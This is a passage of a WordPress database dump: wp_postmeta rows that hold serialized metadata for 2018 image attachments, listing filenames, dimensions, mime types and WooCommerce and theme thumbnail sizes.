s:21:\"h6-img-8a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"h6-img-8a-600x410.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h6-img-8a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:21:\"h6-img-8a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"h6-img-8a-600x410.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h6-img-8a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51569,1507,'_wp_attached_file','2018/08/h5-img-10a.png'),(51570,1507,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:508;s:6:\"height\";i:516;s:4:\"file\";s:22:\"2018/08/h5-img-10a.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"h5-img-10a-295x300.png\";s:5:\"width\";i:295;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"h5-img-10a-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"h5-img-10a-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"h5-img-10a-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:22:\"h5-img-10a-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"h5-img-10a-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51571,4317,'_wp_attached_file','2018/08/h7-port-img-5.jpg'),(51572,4317,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1100;s:4:\"file\";s:25:\"2018/08/h7-port-img-5.jpg\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"h7-port-img-5-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"h7-port-img-5-1024x587.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"h7-port-img-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"h7-port-img-5-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:26:\"h7-port-img-5-1536x880.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:25:\"h7-port-img-5-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:26:\"h7-port-img-5-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:26:\"h7-port-img-5-650x1100.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"attika_mikado_image_huge\";a:4:{s:4:\"file\";s:27:\"h7-port-img-5-1300x1100.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"h7-port-img-5-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"h7-port-img-5-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"h7-port-img-5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"h7-port-img-5-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"h7-port-img-5-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"h7-port-img-5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51573,1700,'_wp_attached_file','2018/08/blog-post-img-8.jpg'),(51574,1700,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:645;s:4:\"file\";s:27:\"2018/08/blog-post-img-8.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"blog-post-img-8-300x149.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:149;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"blog-post-img-8-1024x508.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:508;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"blog-post-img-8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"blog-post-img-8-768x381.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:381;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:27:\"blog-post-img-8-650x645.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:645;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:27:\"blog-post-img-8-650x645.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:645;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"blog-post-img-8-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:27:\"blog-post-img-8-600x298.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:298;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"blog-post-img-8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:27:\"blog-post-img-8-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"blog-post-img-8-600x298.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:298;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"blog-post-img-8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51575,4318,'_wp_attached_file','2018/08/h5-img-14.jpg'),(51576,4318,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:206;s:6:\"height\";i:385;s:4:\"file\";s:21:\"2018/08/h5-img-14.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h5-img-14-161x300.jpg\";s:5:\"width\";i:161;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h5-img-14-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h5-img-14-206x375.jpg\";s:5:\"width\";i:206;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h5-img-14-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:21:\"h5-img-14-206x375.jpg\";s:5:\"width\";i:206;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h5-img-14-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51577,4319,'_wp_attached_file','2018/08/h3-img-gallery-1.jpg'),(51578,4319,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:4:\"file\";s:28:\"2018/08/h3-img-gallery-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"h3-img-gallery-1-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-1-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:29:\"h3-img-gallery-1-1100x650.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:29:\"h3-img-gallery-1-650x1100.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"h3-img-gallery-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-1-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-1-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51579,4318,'_wp_attachment_image_alt','m'),(51580,4316,'_wp_attachment_image_alt','d'),(51581,1300,'_wp_attached_file','2018/08/h5-rev-img-4.jpg'),(51582,1300,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:30;s:6:\"height\";i:3;s:4:\"file\";s:24:\"2018/08/h5-rev-img-4.jpg\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51583,1300,'_wp_attachment_image_alt','m'),(51584,1700,'_wp_attachment_image_alt','d'),(51585,4320,'_wp_attached_file','2018/08/h6-img-9a.jpg'),(51586,4320,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:820;s:4:\"file\";s:21:\"2018/08/h6-img-9a.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h6-img-9a-300x205.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:205;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"h6-img-9a-1024x700.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:700;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h6-img-9a-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"h6-img-9a-768x525.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:525;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:21:\"h6-img-9a-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:22:\"h6-img-9a-1200x650.jpg\";s:5:\"width\";i:1200;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:21:\"h6-img-9a-650x820.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:820;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h6-img-9a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"h6-img-9a-600x410.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h6-img-9a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:21:\"h6-img-9a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"h6-img-9a-600x410.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h6-img-9a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51587,1302,'_wp_attached_file','2018/08/h5-rev-img-3a.png'),(51588,1302,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:751;s:6:\"height\";i:695;s:4:\"file\";s:25:\"2018/08/h5-rev-img-3a.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-3a-300x278.png\";s:5:\"width\";i:300;s:6:\"height\";i:278;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-3a-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-3a-650x650.png\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-3a-751x650.png\";s:5:\"width\";i:751;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-3a-650x695.png\";s:5:\"width\";i:650;s:6:\"height\";i:695;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"h5-rev-img-3a-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-3a-600x555.png\";s:5:\"width\";i:600;s:6:\"height\";i:555;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-3a-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-3a-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-3a-600x555.png\";s:5:\"width\";i:600;s:6:\"height\";i:555;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-3a-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51589,1701,'_wp_attached_file','2018/08/blog-post-img-9.jpg'),(51590,4319,'_wp_attachment_image_alt','c'),(51591,4319,'portfolio_single_masonry_image_size',''),(51592,1701,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:645;s:4:\"file\";s:27:\"2018/08/blog-post-img-9.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"blog-post-img-9-300x149.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:149;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"blog-post-img-9-1024x508.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:508;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"blog-post-img-9-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"blog-post-img-9-768x381.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:381;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:27:\"blog-post-img-9-650x645.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:645;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:27:\"blog-post-img-9-650x645.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:645;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"blog-post-img-9-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:27:\"blog-post-img-9-600x298.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:298;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"blog-post-img-9-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:27:\"blog-post-img-9-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"blog-post-img-9-600x298.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:298;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"blog-post-img-9-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51593,4319,'image_gallery_masonry_image_size','large-width-height'),(51594,1507,'_wp_attachment_image_alt','m'),(51595,4317,'_wp_attachment_image_alt','m'),(51596,1509,'_wp_attached_file','2018/08/h3-page-backround-pattern-scaled.jpg'),(51597,4321,'_wp_attached_file','2018/08/h3-img-gallery-2.jpg'),(51598,4321,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1100;s:6:\"height\";i:550;s:4:\"file\";s:28:\"2018/08/h3-img-gallery-2.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-2-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"h3-img-gallery-2-1024x512.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-2-768x384.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:384;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-2-650x550.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-2-650x550.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"h3-img-gallery-2-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i